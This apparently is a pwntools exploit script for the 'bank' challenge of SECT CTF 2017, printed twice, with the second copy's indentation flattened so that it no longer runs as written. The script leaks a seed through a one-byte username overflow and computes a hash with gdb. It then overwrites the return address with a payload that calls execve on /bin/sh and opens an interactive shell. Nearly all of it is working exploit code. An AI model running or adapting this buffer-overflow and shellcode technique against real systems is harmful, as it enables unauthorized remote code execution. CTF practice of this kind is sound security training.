lionaneesh/pwn_bank_sect2017.py

## pwn_bank_sect2017.py
from pwn import *
import subprocess
context(arch='amd64', os='linux', log_level='info')
name_payload = asm("pop rax; push rsp; pop rcx; pop rdx; push rsp; pop rdi;syscall;")
def get_treasure(r):
    #pass login and leak rand.
    print r.recvuntil("Username: ")
    r.send(name_payload) # 8 characters of input, 1 byte overflow.
    a = r.recvuntil('#> ')
    print a
    a = a.split("\n")
    x = 0
    while x < len(a):
        if a[x].startswith('Welcome'):
            #x += 1
            break
        x += 1
    print "raw : ",raw(a[x])
    treasure = a[x].strip().replace("Welcome "+name_payload, "")
    return treasure

def raw(a):
    return a.encode('hex')

r = process('./bank')
#r = remote('pwn.sect.ctf.rocks', 31337)
raw_input()
treasure = get_treasure(r)
print raw(treasure)
treasure = int(treasure[::-1].encode('hex'), 16)

print "got leak", treasure
from subprocess import call
fp = open("payload_bank", "wb")
fp.write(name_payload+'2\nAAAAA\r\n')
fp.close()
d = subprocess.Popen("gdb -ex 'py seed = " + str(treasure) + "' -x ./bank_gdb.py ", shell=True, stdout=subprocess.PIPE).stdout.read().strip()
print d
h = d.split("\n")[-1].strip().split(" ")[-1]
r.send("2\n")
r.recvuntil("Please enter your secure hash: ")
r.send(h)

rbp = 0xdeadbeef
rip = 0x40000
payload = "\x00" * 16 + p64(rbp) + p64(rip)
payload += p64(0x3b)
payload += p64(0)
payload += "/bin/sh\x00"
payload += "BBB"
r.send(payload)
r.interactive()
	from pwn import *
	import subprocess
	context(arch='amd64', os='linux', log_level='info')
	name_payload = asm("pop rax; push rsp; pop rcx; pop rdx; push rsp; pop rdi;syscall;")
	def get_treasure(r):
	#pass login and leak rand.
	print r.recvuntil("Username: ")
	r.send(name_payload) # 8 characters of input, 1 byte overflow.
	a = r.recvuntil('#> ')
	print a
	a = a.split("\n")
	x = 0
	while x < len(a):
	if a[x].startswith('Welcome'):
	#x += 1
	break
	x += 1
	print "raw : ",raw(a[x])
	treasure = a[x].strip().replace("Welcome "+name_payload, "")
	return treasure

	def raw(a):
	return a.encode('hex')

	r = process('./bank')
	#r = remote('pwn.sect.ctf.rocks', 31337)
	raw_input()
	treasure = get_treasure(r)
	print raw(treasure)
	treasure = int(treasure[::-1].encode('hex'), 16)

	print "got leak", treasure
	from subprocess import call
	fp = open("payload_bank", "wb")
	fp.write(name_payload+'2\nAAAAA\r\n')
	fp.close()
	d = subprocess.Popen("gdb -ex 'py seed = " + str(treasure) + "' -x ./bank_gdb.py ", shell=True, stdout=subprocess.PIPE).stdout.read().strip()
	print d
	h = d.split("\n")[-1].strip().split(" ")[-1]
	r.send("2\n")
	r.recvuntil("Please enter your secure hash: ")
	r.send(h)

	rbp = 0xdeadbeef
	rip = 0x40000
	payload = "\x00" * 16 + p64(rbp) + p64(rip)
	payload += p64(0x3b)
	payload += p64(0)
	payload += "/bin/sh\x00"
	payload += "BBB"
	r.send(payload)
	r.interactive()